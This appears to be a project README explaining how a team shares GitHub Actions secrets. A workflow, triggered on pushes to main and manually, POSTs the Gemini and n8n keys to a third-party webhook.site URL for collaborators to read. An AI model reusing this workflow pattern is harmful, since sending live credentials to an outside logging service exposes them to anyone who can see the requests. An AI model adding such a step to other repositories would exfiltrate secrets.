Secrets environment variables using GitHub Actions workflow webhook
We are storing secrets like n8n API key, JWT token, or Gemini API Key as GitHub environment secrets.
Collaborators of this repository need to be able to retrieve those to develop locally using localhost.
To achieve this, a GitHub Actions workflow sends those secrets to a temporary webhook URL where a GitHub collaborator user can read them, and remove from history (URL expires 7 days later as fallback security to limit secrets exposure).
Created a Production environment following this help article.
Created secret keys following this help article on https://github.com/nicmart-dev/feedmenow/settings/secrets/actions
Authenticated users must have collaborator access to a repository to create, update, or read secrets.
We needed a way to share secrets between our team of collaborators. The problem is that:
Secrets are designed so that you save them in your own secret keeping facility, and in addition, make them readable to GitHub actions. GitHub Secrets are not designed to be a read/write secret vault, only read access to the actions, and write access to the admin.
Following this solution, we decided to implement a workflow that POST the secrets to a webhook.
It should be noted that requests history get saved, so user should immediately delete the request from the history so others cannot see it, even though the webhook URL gets deleted after 7 days anyway as a fallback. That may mean that a new URL may need to be saved to the GitHub Actions workflow before running the workflow. Such URL can be generated by accessing https://webhook.site/
name: Get GitHub Actions Secrets keys
on:
push:
branches: [main]
workflow_dispatch:
jobs:
debug:
runs-on: ubuntu-latest
environment: Production
steps:
- name: Send GitHub Actions Secrets to webhook
uses: fjogeleit/http-request-action@v1
with:
url: "https://webhook.site/[your_unique_id]"
method: "POST"
customHeaders: '{ "Content-Type": "application/json" }'
data: |
{
"GEMINI_API_KEY": "${{ secrets.GEMINI_API_KEY }}",
"N8N_JWT": "${{ secrets.N8N_JWT }}",
"N8N_API_KEY": "${{ secrets.N8N_API_KEY }}"
}For additional security, it is recommended to upgrade webhook.site which then allows to use custom actions such as Don't save so requests are not saved in history but only displayed in open browser tab.
-
Go to workflow by clicking on Run workflow button
-
Navigate to webhook.site URL in the file
.github/workflows/getApiKeys.ymlon the repo -
Open POST request in the Search query section:
-
After adding those secrets to the
server\.envfile, make sure to click the red X icon to remove request from the history
Note: if errors running workflow or the request does not appear in webhook.site, that likely means the URL has expired and so you should update the workflow with a new URL
During development, installed this extension which makes running workflows faster: https://marketplace.visualstudio.com/items?itemName=GitHub.vscode-github-actions